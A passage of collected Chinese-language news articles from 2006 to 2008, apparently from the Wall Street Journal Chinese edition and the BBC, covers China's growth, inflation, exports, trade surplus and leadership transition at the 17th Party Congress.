财富是房地产，在这种情况下，把房地产刺激起来，就能拉动很大的市场需求。对美出口此外，长林毅夫还说，中国对美国的出口仍相当强劲，也许会放缓一点，但绝对不会负增长。他指出，美国是中国第二大贸易伙伴。美国经济放缓，到底会不会导致中国经济的放缓？这让大家对中国经济发展的不确定性产生担心。他分析说，中国出口到美国的产品以劳动力密集型产品为主，这些产品大都是生活必需品，也就是所谓收入弹性比较低的产品，一般的消费者不管收入是高还是低，都要消费的产品。在这种情况下，即使美国经济放缓，对中国产品的需求影响也不会很大。林毅夫相信，美国经济放缓对中国经济的影响可能不大。……………………2008 年 06 月 10 日 格林尼治标准时间 14:12 北京时间 22:12 发表转寄朋友 打印文稿“中国应容忍通胀以避免衰退”余斌表示，中国可能不得不将注意力由遏制通胀转到维持经济增长上面中国政府研究人员表示，中国经济 2008 年有急剧衰退的危险，可能不得不容忍超标的通货膨胀以维持经济增长。中国国务院发展研究中心的宏观经济研究负责人余斌表示，中国可能不得不将注意力由遏制通胀转到维持经济增长上面。他说，许多人看到通胀的危险，也注意到经济过热的风险，但是看到 2008 年经济严重衰退的人却不多。北京一直在极力遏制高通货膨胀。中国在 4 月的通胀率达到 8.5%，接近过去 12 年当中的最高水平。不过在 5 月通胀率下降到了 7.7%，许多经济学家估计通胀率在 2008 年其余时间会进一步下降。余斌说，现在几乎已经不可能将消费指数（CPI）控制在 4.8% 的官方指标内，但是他认为决策者应该担心经济急剧衰退的危险。中国经济增长必须要保持在 10% 左右才能满足今年的就业目标，即创造 1,000 万个就业机会。他还补充说，中国出口以美元计算，在今年头 4 个月比去年同期增加了 21.5%，数量上并不大。在宁波，青岛和大连等主要港口，货物转运量有所下降。国内股市不稳也增加了公司募集资金的难度，房屋市场冷却可能限制钢铁等上游行业。原材料和劳动力价格上涨也可能使许多投资者对新项目更加谨慎投入。……………………洋鬼子在中国媒体则对中国经济进行了持之以恒的关注。中国经济飞速发展被指损害了邻国利益2006 年 06 月 30 日联合国 (United Nations) 报告称，中国经济的飞速发展损害了周围贫困国家的利益，低成本的中国产品大量涌入，不但占据了不丹和孟加拉国等国国内的市场，还让当地出口商几无盈利之路。联合国发展项目委员会 (U.N. Development Program) 周四在柬埔寨发布了这份报告，重点阐述了为何日渐开放、充满竞争活力的全球贸易体系没能给全球最不发达国家带来福音。报告称，亚洲穷国也曾尝试过开放和与国际接轨，他们的市场比其他地区贫穷国家的市场更加开放和自由，但未能赶上中国的步伐。联合国副秘书长哈菲茨? 帕沙 (Hafiz Pasha) 在接受电话采访时表示，我们赞赏中国的高速增长，这也是激励其他国家发展的动力。不过，亚洲最贫困的国家 “无力与中国进口产品竞争，也无法进入中国市场，因为他们没有中国需要的高科技产品和资本品等商品。”就在中国的低成本鞋类和家具引得欧美生产商一片怨声载道，称这些产品的价格被不公平地人为压低之际，联合国这份报告则指出，那些严重依赖于低端行业的穷国受到的打击更为沉重。帕沙说，中国工人的薪资很低，因此与某些发展中国家的竞争就更加直接。帕沙兼任联合国发展项目委员会亚太局局长。尼泊尔和老挝等穷国最重要的出口产业往往是纺织品和服装。但在这些国家的保护伞──全球配额体系于 2005 年废止后，中国遂抢走了一些小国的订单并扩大了自己的市场份额。5 月份以来，孟加拉国的服装厂工人屡次走上街头示威，要求加薪和改善工作环境。这些国家纺织品行业所承受的压力之巨由此可见一斑。示威行动偶尔失控，导致几名工人被杀，几家工厂被焚被毁。帕沙说，联合国发展项目委员会设想了一套双管齐下的解决方案：资助受冲击的国家发展其他产业，从而拉动经济发展；同时鼓励较富裕的国家为这些穷国的产品制定优惠贸易安排。他表示，希望不仅仅是美欧富裕国家做出努力，也希望看到中国做出贡献。中国延长了针对非洲穷国的一些优惠贸易条款，但帕沙说此举主要是为了换取当地的石油和其他原材料，以满足中国飞速发展的经济之所需。亚太地区的穷国身处僻壤，自然资源匮乏，也就没有同样的吸引力。中国外交部发言人称，中国一贯在力所能及的范围内向发展中国家提供援助。Andrew Batson……………………美国官员对中国某些政策变化表示担忧            2007 年 10 月 11 日 07:20 大      中      小      美国官员周三表示已经向中国方面表达了对于中国税收等政策变化的担忧，这些变化似乎正朝有利于中国公司、不利于外国竞争对手的方向发展，这可能是中国经济开放政策的一种倒退。广告美国商务部代理副部长帕迪利亚 (Christopher Padilla) 表示，美国公司现在抱怨，一些中国官员似乎倾向于采取更封闭化和限制性的政策。帕迪利亚和美国副贸易代表巴蒂亚 (Karan Bhatia) 是在与中国官员会晤后向记者表示的。会晤的目的是为 12 月举行的美中商贸联合委员会（Joint Commission on Commerce and Trade, 简称：美中商贸联委会）会议做准备。帕迪利亚和巴蒂亚表示，他们对中国今年颁布的反垄断法及税收、科技等政策变化表示了担忧，这些政策可能有利于中国公司。……………………经济发展仍然是中国政府的重中之重            2007 年 10 月 16 日 09:40 英      大      中      小      中国国家主席胡锦涛带着一项艰巨的平衡任务开始了他的第二个五年的任期，他表示中国政府的工作重点仍是保持快速的经济发展，同时他还承诺要构建更加平等的社会，并创造更好的自然环境。胡锦涛周一在每五年一次的中国共产党全国代表大会上发表了讲话，他指出经济发展仍是中国共产党的中心任务。中国的人均国内生产总值在过去五年中几乎翻了一番，于 2006 年达到了略多于 2,000 美元的水平。胡锦涛表示，中国政府的目标是在 2020 年前将人均国内生产总值在此基础上再增长一倍，并基本消灭绝对贫穷的现象。虽然最近几年中国经济的飞速增长（自 2003 年以来，中国经济的年增速在 10% 以上）已令很多中国人生活更加富足，但国内的贫富差距在不断扩大，环境破坏也日益严重。胡锦涛在人民大会堂向 2,000 多名党代表发表讲话时指出，中国的经济增长是以极高的资源和环境成本为代价的。广告胡锦涛指出，为了在不耗费太多资源的情况下保持经济快速增长，中国将来需要更多地依靠技术创新及提高生产率来促进经济的发展。他还为这个全球第四大经济体勾勒出产业结构调整的蓝图：着力发展高科技而非重工业；着力发展服务业，而非制造业；坚持扩大国内需求，减少对出口的依赖。为了确保经济增长惠及更多国人，胡锦涛表示，政府将提高最低工资标准，扩大医疗保健及社会保障网络的覆盖范围，并且将促进私人领域增加就业岗位。胡锦涛的讲话主要围绕整体发展策略，而没有一一列举新的政策。他的讲话几乎未涉及人民币汇率、房地产价格及股市飙升等短期经济问题。中国股市基准上证综合指数周一收于 6030.08 点的历史新高，该指数今年迄今的累计涨幅已经达到了 125%。分析师称，既然政府高层领导已就胡锦涛讲话列出的几个优先问题达成了一致，各政府机构将在未来几个月制定出具体的政策。中国人民大学 (Renmin University) 金融学教授赵锡军指出，从胡锦涛讲话的重点不难看出，未来几年发展经济仍在政策制定中占据了最核心的位置，其重要性超出了其他任何问题。赵锡军表示，中国政府重点关注环境问题意味着，污染制造者将面临高额罚金，节约能源的技术将获得税收方面的鼓励；此外，由于中国政府明确表示了希望提高居民家庭收入，个人所得税税率或将随之下调。不过胡锦涛并未明确表示他将如何解决经济增长与保护自然环境及实现社会和谐之间的冲突。地方官员在贯彻胡锦涛的政策时有可能被夹在这两大工作重点之间左右为难。西安市市长陈宝根日前在接受采访时表示，中央政府确实要求地方加强环境保护，但地方政府也需要保持快速的经济增长。陈宝根指出，发展的提速为更多国人创造了就业机会并增加了他们的收入，从而给地方政府带来了更多税收。西安市政府需要这些钱来履行自己有关提高社会服务标准的承诺。他表示，如果没有资金，市政府就无法支持教育、改善医疗保健体系。事实上，胡锦涛也在他的讲话中指出，保持经济增长是保证党和国家长治久安的根本要求。迄今为止，中国共产党一直将促进经济繁荣视作一副良方，用之化解任何因其执政而引发的不满情绪。胡锦涛在讲话中确实提及了政治改革，他在讲话中至少六十次提到了 “民主” 二字，但他明确指出，必须维护中国共产党的一党执政，未来任何可能出现的改变都将在一定限度之内。由于近年来中国政府一直将重心置于国内事务之上，其对国际争端以及军事行动基本上采取了回避态度，而且此次胡锦涛也指出中国将坚持走和平发展的道路。解决台湾问题仍是中国军事及外交方面的最重要工作，而且近来两岸关系正处在紧张状态。不过，胡锦涛并未提议要大幅调整对台政策。他提出要和台湾当局就两岸和平展开协商，但前提是台湾领导人必须承认台湾是中国的一部分，而台湾现任领导人已经表示了不接受这一谈判前提。Andrew Batson / Jason Leow……………………中国第五代领导人即将初露端倪            2007 年 10 月 15 日 10:57 英      大      中      小      本周中共全国代表大会上即将出现的领导层人事变动有望向世人证实，中国正在将权力逐步移交给新一代精英──那些懂经济、懂商务、比其前任更注重与外部世界联系的官员。定于周一开幕、周日结束的中国共产党第十七次全国代表大会预计会提拔一批更年轻、接受过更广泛教育的干部担任党的高级领导职务，并促进全国各地政府部门也产生类似的转变。分析师称，这种变化将促使年轻一代领导人开始在出谋划策和制定政策过程中发挥更大影响力，并有望改变中国政府部门同海外企业打交道的方式，尽管这种转变可能是一个渐进的过程。中国共产党全国代表大会每五年举行一次，此次会议将批准政治局和政治局常委新人选。政治局是中国共产党最重要的领导机构，由二十几位委员组成，每月举行一次例会。政治局中拥有超级权威的则是目前由八名常委组成的常务委员会。此次大会还将批准一个确定今后五年主要任务的政治报告。现任党的总书记胡锦涛提出的推动中国实现更加均衡的发展，解决贫富差距扩大和经济高速发展带来的不良影响的方针预计会在报告中得到进一步的强调。中国目前一代的领导人中许多都在 60 岁以上，多为工程师出身，是在 1978 年中国结束封闭状态，开始实行对外开放前成长起来的。与他们不同的是，新一代领导人多在 50 多岁，学的多是法律或经济，许多人都是在改革开放后的 80 年代走上工作岗位的。在这批所谓的 “第五代” 领导人中，两位最重要的人物是现任上海市市委书记习近平和东北工业大省辽宁省省委书记李克强。二人都拥有法律学位，预计将在此次大会上跻身政治局常委──本次会议可能要更换一半的政治局常委。这两人中的一人或许将在 2012 年胡锦涛的任期结束后接替胡的位置。不过，预计胡锦涛不会在本周的会议上指定他的接班人，而会继续采用依靠政治局常委多数意见决策的方式，避免出现一言堂的局面。同他们的前辈一样，年轻一代领导人也都是坚定的共产党员，不太可能推进激进的政策变革。不过，中国领导层目前的任务应是完善政治和金融体制，使之与高速增长的中国经济相匹配，在这一点上，新一代领导人在法律和其他社会科学方面的经历恰恰与之相吻合。而前一代领导人将工作重点主要放在了建设大坝、桥梁和其他基础设施上，这也是他们多具有理工科背景的一种反映。今后几个月中，各级党和政府部门中的官员可能都会出现更迭，其中包括省部级和地区一级的领导职位。从现实角度看，新一代领导人的崛起可能会让外资企业高管推进项目或是同政府高级官员的接触变得稍微容易一些，因为年轻一代领导人对企业更加了解，在同外国人打交道方面也更有经验。同目前大多数高层领导不同的是，新一代领导中有些曾在美国或其他国家长期工作或学习过，有的甚至长达几年时间。目前，领导层中的最高职位大多仍将由上一代人担任，这会限制那些年轻官员的影响力。不少新一代领导人都将担任副职，如副省长、副部长，或政府及政府下属研究机构的首席顾问，等等。不过，他们会逐步开始担任更高级的职务。美国布鲁金斯学会 (Brookings Institution) 中国问题专家李成在一篇文章中写道，随着在今后十年左右的时间里权力逐步向下一代人过渡，接受过西方教育的中国政治精英可能会发挥更重要的作用。上海市委书记习近平此前曾担任另一个富裕省份浙江省的省委书记，并因实行有利于市场经济的政策而广受赞誉。美国财政部长亨利? 鲍尔森 (Henry Paulson) 曾将习近平描述为 “知道如何实现目标的人。” 而辽宁省委书记李克强的政绩则是通过吸引日本和韩国投资，推动了这个没落工业大省的振兴。由于中国的国际地位不断提升，国际社会也要求中国政府能在国际外交中发挥更积极的作用。近几周来，中国在缅甸问题上一直面临压力，尽管中国的立场一直是宣称不干涉别国的国内政治。但分析师们表示，随着越来越多在国外接受过教育的官员走上领导岗位，这种立场也将发生变化。布鲁金斯学会另一位中国问题专家黄靖称，在第五代领导人开始掌权后，中国的对外政策将会更加开放、宽松和老练，这不仅仅是因为这些领导人具有丰富的国际经验，而且是因为中国已经不可逆转地融合到了目前的国际体系中，这是一种基于全球市场经济，以民主为主导的体系。Jason Leow……………………中国经济增速有望触顶回落            2007 年 10 月 25 日 14:36 大      中      小      中国第三季度经济增长有所放缓，这可能表明今年的经济增长率已经触顶，有望进一步出现回落。中国国家统计局 (National Bureau of Statistics) 周四宣布，第三季度经济增长率为 11.5%。第二季度经济增长率高于预期，为 11.9%，而第一季度为 11.1%。今年前三个季度，中国的国内生产总值 (GDP) 增长了 11.5%。经济增长的主要动力之一是房地产投资热，以及企业对新工厂产能的大量投资。2007 年至今，此类固定资产投资增长了 25.7%。但经济增长的另一主要推动力──出口，其近几个月来的增幅却较年初时近 30% 的增长率略有放缓。第三季度的增幅略低于部分人士的预期。中国央行的研究部门曾预计第三季度的增长率将回落至 11.7%。同许多观察人士一样，央行的经济学家也预计今后几个月的经济增幅将温和回落：他们预计第四季度的增长率为 11.5%，然后会在 2008 年上半年降至 11% 以下。广告但几乎没有人预计经济增长率会大幅下降。近几周来，中国官员多次表示，政府短期内的经济政策重点仍是抑制经济偏快增长。不过，他们尚未发出经济过热的警告或是宣布新的紧缩措施。中国国务院周三表示，将继续抑制固定资产投资增长过快和信贷投放过多，并抑制物价过快上涨。7 月份公布的第二季度经济增长之强劲，超出了人们预期，此后央行已经三次上调基准贷款利率，总共调高了 0.72 个百分点。消费物价指数的大幅上扬（8 月份达到了 6.5%）也是上调利率的原因之一。不过物价的上涨主要是由于猪肉短缺造成的，迄今为止，其他商品的价格并未大幅上扬。由于猪肉价格从前期高点回落，9 月份的通货膨胀率也降到了 6.2%。Andrew Batson……………………中国经济尚无力支撑全球发展            2007 年 10 月 26 日 13:09 英      大      中      小      尽管中国第三季度经济增长率再次达到了两位数，但国内消费的持续疲软很可能会限制其在美国经济减缓之际支撑世界经济的能力。周四公布的数据显示，中国经济仍在高速增长，第三季度经济比去年同期增长了 11.5%，但在政府采取了预防经济失控的多项措施之后，当季经济增速有所回落。最新统计数据还显示，今年消费者支出对经济增长的贡献率要小于去年，对出口的依赖性则在加强。国内消费的增长有助于解决贸易失衡问题，并使中国有更多机会在维持世界经济扩张的问题上发挥更大作用。周四公布的数据也包含一些令人鼓舞的消息。第三季度增长率已经从第二季度 11.9% 这一令人不安的高位回落。尽管通货膨胀率仍处于 6.2% 的高水平，但也较近期的高点出现了下滑。这一结果足以令政府官员相信近期采取的提高贷款利率和降低出口退税等政策暂且降低了经济过热的风险。分析师目前预计，今后几个月里中国经济的增速还会逐步放缓。预计中国 2008 年的国内生产总值 (GDP) 增幅可能降至 11% 以下，不过用国际标准衡量，如此增速依然非常可观，尤其是对于中国这个很快将超过德国、成为全球第三大经济体的国家而言。在美国经济陷入衰退的可能性不断加大的情况下，中国经济能否保持高速增长就变得越发重要了。Action Economics 驻新加坡的经济学家大卫? 科恩 (David Cohen) 说，以前，如果美国经济陷入危机，全球都难以保持增长；现在看来继续维持增长的机会则多了一些，因为随着亚洲经济的迅猛增长，美国的重要性比五、六年前有所降低。广告中国经济在过去几年里的加速增长主要得益于以下两个因素的推动：一是房地产、基础设施和工厂建设的繁荣，另一个则是出口的大幅增长。最近几个月这两个领域的增幅虽有所收窄，但仍维持在很高水平：今年以来投资支出增长了 25.7%，而去年同期为 27.3%。中国的贸易顺差在第二季度曾猛增 74%，但第三季度增长了 50%，这主要是由于出口税率的改变和去年的比较基数过高所致。不过这两种增长来源都存在风险，而且随着中国对这二者的依赖不断增加，风险也在不断累积。热情高涨的企业和本地政府目前投资了大量项目，但其中很多可能会在几年内失去意义，成为经济的累赘。尽管出口制造业因为欧美和日本消费者大量购买中国产品而发展得生机勃勃，但发达国家消费支出的下降可能使之遭受重创。因此，许多来自国内和国外的声音都呼吁中国转变增长模式。美国财政部长亨利? 鲍尔森 (Henry Paulson) 周二在讲话中表示：“中国向世界证明了它能够实现快速增长，但它能以不同的方式增长，最终实现更明智的增长吗？” 他指出，为使经济增长摆脱对重工业、高能耗和出口的依赖，中国需要大胆地进行结构性政策调整。中国政府表示它正在向这个方向进行转变。中国国家统计局 (National Bureau of Statistics) 发言人李晓超在周四通报国民经济运行情况的新闻发布会上表示，调整投资和消费的关系一直是近年来中国宏观调控的一个重点，目的就是要增加消费对经济增长的贡献。他说，收入增长和社会福利项目使中国消费者的手头更加宽裕了。李晓超表示，根据初步核算，今年前三季度，消费对经济增长的贡献率为 37%。而根据国家统计局以前公布的数据，2006 年全年消费对经济增长的贡献率为 39%。因此这意味着实际上消费的重要性反而下降了。而中国对出口和投资的依赖程度都有所增强：今年前三季度，出口对经济增长的贡献率为 21.4%，投资对经济增长的贡献率为 41.6%。中国经济中出口的作用相对较大而消费支出的作用相对较小是中国的经济增长至今未能对全球经济产生更大推动力的原因之一。中国的建筑热令世界上的原材料和重型设备生产商受益匪浅，但中国的消费者并未购买很多海外商品。国际货币基金组织 (International Monetary Fund) 亚太地区事务部副主任史蒂文? 杜纳威 (Steven Dunaway) 曾在 10 月 19 日表示，虽然中国和印度等新兴经济大国在全球经济增长中占据了很高比重，但就全球而言，增长的原动力仍来自世界其它国家各自的国内需求，而非由亚洲本地区创造的国内需求所带动。这意味着全球经济的发展趋势对中国的重要性不但没有降低反而有所提高了。李晓超称，美国房地产市场的疲软、次级贷款抵押市场危机和油价高企是可能影响中国的主要外部风险。李晓超向记者表示，由于全球经济发展的前景尚存变数，因此对中国的影响也不确定。他还表示，中国政府准备采取必要的政策来确保中国经济快速稳定地增长。Andrew Batson……………………中国今年上半年经常项目盈余增长            2007 年 11 月 01 日 09:10 大      中      小      中国政府的一项研究显示，今年上半年中国的经常项目盈余达到 1,629 亿美元。研究还暗示，中国经济今年下半年或许将继续保持高增长。这份登载于中国国家外汇管理局 (State Administration of Foreign Exchange, 简称: 外管局) 网站上的公告重申了政府实施的宏观政策以及所采取的态度。该局表示下半年，“潜在的风险不容忽视”。此外，它还指出，“国家已明确把防止经济由偏快转为过热作为当前宏观调控的首要任务”。广告中国的经常项目盈余问题不仅在一定程度上促成了经济的快速发展，而且也引发了中国与主要贸易伙伴间的摩擦。根据外管局的数据，中国去年上半年的经常项目盈余为 915.8 亿美元。中国巨额贸易顺差继续支撑着经常项目盈余，但中国政府已表示，其长期目标是寻求国际收支平衡，这也是它解决经济发展失衡问题的目标之一。外管局还指出，今年上半年资本和金融项目盈余达到 902 亿美元。外管局表示将研究多种方法来帮助缩小顺差：如拓宽个人投资者的海外投资渠道、加大对出国直接投资的支持、放松对外国机构筹集以人民币计价基金的限制。……………………中国发展为世界带来双赢机会            大      中      小 2007 年 11 月 13 日 15:09      中国驻美大使周文重表示，中国计划于 2050 年前将其 13 亿国民的人均收入提高三倍，这对世界经济来说也是个实现 “双赢” 的机会。但周文重在周一的演说中同时指出，美国贸易保护主义和国会对台独势力的支持将会威胁到中美关系。周文重在密歇根大学 (University of Michigan) 发表演说时指出，中美两国都应反对台独。台下观众静穆而庄重。周文重 30 分钟的演说以抚慰为基调，随后有半小时的提问时间。问题大多谦逊有礼，只是偶有尖锐。此次演说没有出现其他中国政府官员在美公开亮相时通常会出现的抗议活动。只有一位亲台抗议人士在会场外的人行道上举着标语牌。周文重表示，中国人民清楚了解自由与和平的意义，和平发展是国家发展的唯一之路。作为中国驻美大使，现年 62 岁的周文重精力充沛，足迹遍及世界很多地区。他 8 月份就曾在俄勒冈州、怀俄明州和华盛顿州发表过一系列演说，期间谈到了中美两国产生摩擦的多个关键原因。当被问及中国出口玩具和食品引发的一系列安全担忧时，周文重回应，中国政府已采取措施加强安全监管。他批评美国国会提出数十个议案，就多项贸易问题针对中国，包括盗版、中国贸易顺差及汇率政策等。周文重表示，越来越严重的保护主义情绪尤其令人不安，问题与摩擦在所难免，但保护主义或者将贸易问题政治化决不应成为解决之道。周文重谈到，1978 年至 2006 年，中国经济的年均增长率为 9.6%，国民生产总值从 1,473 亿美元增加到目前的 2.8 万亿美元。但他同时也指出中国未来的发展道路依然漫长，2006 年中国人均收入为 2,100 美元，而美国为 43,867 美元。广告他说，近日召开的中国共产党第十七次全国代表大会确定的目标为，2020 年时人均收入达到 3,500 美元，2050 年时人均收入增长三倍。他表示，中国对所有其他国家都奉行双赢政策，中国的发展对世界来说是个机遇。美国财政部长鲍尔森 (Henry Paulson) 最近对中国的贸易政策提出批评。中国的贸易政策被认为是造成人民币估值过低以及中国对美国巨额贸易顺差的原因之一。鲍尔森认为，中国严重偏离了国际规范和人们的期望。周文重驳斥了中国实行保护主义的说法，并指出中国将会进一步向世界开放。他说，中国已经成为发展中国家里开放化程度最高的经济体之一。……………………中国成金砖四国中最不受欢迎市场            大      中      小 2007 年 12 月 20 日 14:36      美林公司 (Merrill Lynch & Co.) 周三表示，中国已经超过印度成为 12 月份金砖四国 (BRIC countries) 中最不受欢迎的证券市场。根据美林公司周三发布的全球新兴市场货币经理人调查显示，对中国经济增长的预期下降，超过 30% 的基金经理认为中国经济将放缓；2005 年也曾有过类似的预期。金砖四国是指巴西、俄罗斯、印度和中国四个全球发展最快的新兴市场。在之前的调查中，印度通常是金砖四国中最不受欢迎的市场。美林公司表示，调查还显示市场重新看跌全球经济增速和公司利润。美林还称，投资者继续增持新兴市场头寸，但增持的比例减小。42% 的基金经理预计在未来 12 个月内，新兴市场的公司利润将更为糟糕，而在 11 月份仅有 9% 的基金经理持有这种观点。广告除此之外，为数不多的投资者预期未来 12 个月新兴市场的企业收益将增长至少 10%；有 58% 的投资者预期新兴市场的企业收益会增长，而在 11 月份时有 73% 的投资者持此观点。投资者对于新兴市场国内需求维持原先看法。就地区而言，亚洲市场继续受欢迎，而新兴欧洲、中东及非洲地区则是最不受欢迎的地区。与此同时，投资者增持巴西、俄罗斯、土耳其、泰国及印度尼西亚市场头寸，而减持智利、以色列、波兰、台湾及南非市场头寸。在类股方面，非必需消费品类股在新兴市场的基金经理中最受欢迎，有 53% 的经理称增持此类股票。投资者还增持能源、电讯和工业类股。相比而言，投资者减持的是科技、公共事业、医疗保健及金融类股。本文涉及股票或公司Merrill Lynch & Co. Inc.总部地点：美国上市地点：纽约证交所股票代码：MER……………………中国经济要名义增长还是实惠增长？            大      中      小 2008 年 01 月 11 日 16:06      《华尔街日报》中文网络版专稿张巍柏中国经济近几年来持续快速增长，但中国民众的幸福感为何没有等比例增加？研究这个问题的人们告诉了我们很多答案，例如人均收入增长速度大大低于税收增长速度，等于经济增长的成果主要让政府拿走了等等。其中还有一个更加要命的答案，那就是通货膨胀。当前物价的飞速上涨意味着大众手中的货币在不断贬值，实际上在收入名义增长的同时，购买力在飞速下降。事实上，不单是中国碰到如此问题，就连资本主义的发源地英国，最近也为此甚为苦恼。一项最新发布的研究报告显示，英国人的生活水平今年将首次超过美国，而此前一个多世纪以来，美国生活水平一直稳居全球榜首。按照人均国内生产总值 (GDP) 的多少，英国知名研究咨询机构 “牛津经济学”(Oxford Economics) 得出了上述令英国人 “扬眉吐气” 的结论。“牛津经济学” 预计，2008 年英国人均 GDP 将达到 2.35 万英镑，超过美国的 2.325 万英镑，也高于法国的 2.17 万英镑和德国的 2.1665 万英镑。这将是自 19 世纪以来，英国生活水平首次超越美国。很多人相信上述数字很大程度上是因美元疲软、英镑坚挺使然。“牛津经济学” 主管艾德里安? 库珀 (Adrian Cooper) 表示，除汇率外还有一个更重要的原因，那就是英国十几年来的经济增长，特别是上个世纪 90 年代初的增长。报告显示，上世纪 90 年代初，英国人均 GDP 比美国低 34%，比德国和法国分别低 33% 和 26%。经过十几年的快速发展，如今英国人均收入不仅首次超越美国，同时还比法国和德国高出了大约 8%。广告不过，对普通英国人来说，上述数据只是种安慰，生活水平高更多体现在数字的增长，而非大众的实际感受上。近几年来，英国房地产市场价格高企，再加上近期石油等能源价格创纪录增长，英国人的收入已经严重缩水。从购买力平价来看，在美国人抱怨实际收入几十年来没有提高的同时，英国人面对高昂的商品和服务价格，其实际 “幸福感” 也并不比大洋彼岸的美国人强。英国人得到了人均 GDP 超过美国人的名义，美国人却得到了物价低廉的实惠。未来的中国，到底需要像英国一样的名义增长，还是需要像美国一样的实惠增长？从现在的情况看，中国正在踏上获得名义增长的道路。问题是，快速的名义增长所伴随的是实质购买力的大幅下降。1992－1993 年，中国的经济增长名义上都超过了 20%，可留给国人的是什么？那一次的经济飞速增长，带给中国的是十年都未消化完的烂尾楼还有数额极为巨大的坏账，几大国有银行事实上都已接近破产或是已经破产；此外还有成千上万的国企倒闭和数千万国企职工的失业大军……很多人认为，我们当前的经济增长或可避免这样糟糕的结局，从而上演一番中国经济增长的神话。但这恰是脑袋发热的最佳证据。目前中国的经济增长，按名义计算，超过 16% 是最保守的估计。2007 年中国 GDP 实质增长超过 11% 是毫无疑问，而下半年的居民消费价格指数 (CPI) 超过 6%、全年达到接近 5% 水平也是毫无疑问。这都是基于官方统计数据而言的，如果我们考虑经济增速的低估，考虑 CPI 数字还有很多应该统计而尚未统计的低估状况，中国经济名义增长速度已经大大超出官方统计范畴，接近或达到名义上的 20% 可能是与实际情况比较相符的。综上所述，中国经济显然已经越来越接近那种虚假癫狂的状态，我们得到了资产价格不断膨胀的疯狂，但失去的是购买力增长的实惠。如果我们不开放市场将资产泡沫向外转移，不将过剩的人民币输出到国际市场，不解决社会保障问题以提升居民的消费信心从而化储蓄 / 投资为消费，那么，超过 20% 名义增长的中国经济就会因为大量的市场管制而成为一种纯粹的泡沫游戏。（本文作者张巍柏系安邦集团研究总部分析师，文中所述只代表他的个人观点。）……………………中国或以提振内需应对外部经济挑战            英      大      中      小 2008 年 01 月 24 日 11:06      中国周四将公布 2007 年第四季度及全年经济数据，去年的经济增长率连续第二年超过 11% 几乎已成定局，这一增长水平即使以中国近年来的标准衡量也是相当高的。但鉴于全球经济增速有可能在美国引领下出现放缓，中国政府的施政重点现在看来很有可能发生转变，从遏制因经济蓬勃发展而引发的通货膨胀和其他过热现象，转到为创造足够的就业机会而维持经济的必要增长上来。中国政府计划今年新增 1,000 万个城镇就业机会。这意味着政府将更加注重内需对经济增长的拉动作用，而很长时间以来对外贸易一直是中国经济增长的主要推动力。事实上，中国的出口增速在去年最后几个月已开始放缓，其对经济的影响正在显现。中国的经济增长率在去年第二季度达到 11.9% 的峰值后便开始下行，第三季度降至 11.5%，第四季度的增速看来还会进一步回落。一些出口商由于来自美国的订单下降正计划裁员，这有可能进一步对家庭和消费者支出造成负面影响。更为糟糕的是，目前居高不下的通货膨胀率也在侵蚀着人们的购买力，而股价以及某些城市房价的下跌又使人们的财富进一步缩水。中国银监会副主席蒋定之本周表示，2008 年国内外的经济和金融环境将更为复杂，中国的经济金融可持续发展将面临更为严峻的挑战。眼下，中国领导人仍将主要注意力放在遏制居高不下的通货膨胀上，中国去年的通货膨胀率已接近 5%。政府甚至出台了冻结电价和燃料价格的措施，并对某些食品实施了价格控制。持续的通货膨胀限制了政府通过降息等举措提振经济的能力。但如果通货膨胀形势出现缓和、美国和欧洲的经济形势继续恶化，当前的这种局面有可能迅速出现改观。中国银河证券 (China Galaxy Securities) 首席经济学家左小蕾认为，中国政府已开始关注美国经济陷入衰退的可能性。虽然人们预计中国今年的经济增长率最差也能达到 9% 左右，但这一增速与过去两年的落差却是十分明显的。左小蕾说，政府应该刺激国内消费，以弥补外部需求下降造成的不利影响。其实，中国政府在化解这种不利影响方面一直是不遗余力的。在亚洲金融危机爆发后的 1998 年，政府通过积极的财政政策使经济增长率得以维持在接近 8% 的水平。但这种刺激经济的做法也存在危险性，那就是一旦政策效应消退，经济便有可能陷入萧条。近年来，住房、工厂和基础设施建设热潮一直是推动中国经济增长的主要动力。这方面的投资增长得如此之快，以致于许多官员担心会出现供大于求局面。为避免产能过剩，中国政府频繁出台遏制投资增长的措施，并警告说要减少经济增长对投资的依赖。但如果中国领导层认定需要上马更多基础设施项目以抵消出口增长放缓产生的不利影响，上述担心可能就会被抛到脑后了。法国兴业银行 (Societe Generale) 亚洲经济学家格伦? 马奎尔 (Glenn Maguire) 说，如果其他主要经济体的增长速度确实严重放缓，那么中国要维持确保社会稳定所必需的经济增长速度，就需要加大建设和投资力度。就业人数的增长是看得见摸得着的，它的份量可要大大超过对产能过剩和无效投资的抽象担忧。马奎尔因此认为，中国政府有可能暂时放弃一段对更均衡增长的追求。中国已经上马了许多大型投资项目。铁道部本月早些时候宣布今年将大力加快铁路新线建设，根据计划中国今年将斥资人民币 410 亿元新增铁路通车里程 7,820 公里。鉴于联合国估计中国的城市人口每年将增加 1,800 万，因此加快住房和公用事业建设大可不必担心造成供大于求。除北京外，中国目前还有成都、武汉和广州等十个左右城市也在兴建和扩建地铁系统，另有几个城市的地铁建设计划正待批准。多数分析师还预计，政府对原材料和高污染产品出口的税收和监管限制也会放松。这些去年出台的限制措施旨在解决贸易顺差过大的问题，这个问题不仅引发了中国与美欧间的政治摩擦，还导致大量资金涌入银行体系，使其难以有效处置。但随着美国经济出现疲软，中国政府要求遏制贸易顺差过快增长的声音也减弱了下来。中国的出口增速已从 2007 年上半年的 29% 放缓至下半年的 22%，政府又开始考虑扶持出口商了。中国商务部部长陈德铭上周表示，企业出口正面临着新的压力，稳定出口的任务非常重。全球经济增长的温和放缓实际上有助于缓解中国近年来出现的一些经济问题。国内食品价格上涨一定程度上就是全球农产品市场供应吃紧推动的，而不断增长的贸易顺差则导致大量资金涌入国内银行体系。政府的一些智库预测，中国今年的经济增长速度只会略微放缓，仍可维持在 10% 至 11% 的水平，鉴于经济增长率超过 11% 后可能产生的各种不利影响，这一增长水平更为人们所乐见。但如果出口大幅滑坡导致失业率上升，那情况就完全不同了。国家发改委经济学家樊彩跃本周撰文称，虽然出口增长目前出现的放缓势头有助于缩小贸易顺差、纠正外部失衡，但中国仍然面临着巨大的就业压力，仍然需要维持一定的出口增速，因此如果出口增长大幅放缓，将对中国经济的稳定快速增长不利。为了改善中国经济易受出口和投资波动影响的局面，政府过去两年中一直试图鼓励国内消费者少存多花。但改变人们的支出习惯可比上马公共工程要费时得多。国内消费支出增速迄今未有明显增长。在扣除通货膨胀因素后，中国去年 1 至 11 月的零售额增幅为 12.8%，与 2006 年全年的 12.7% 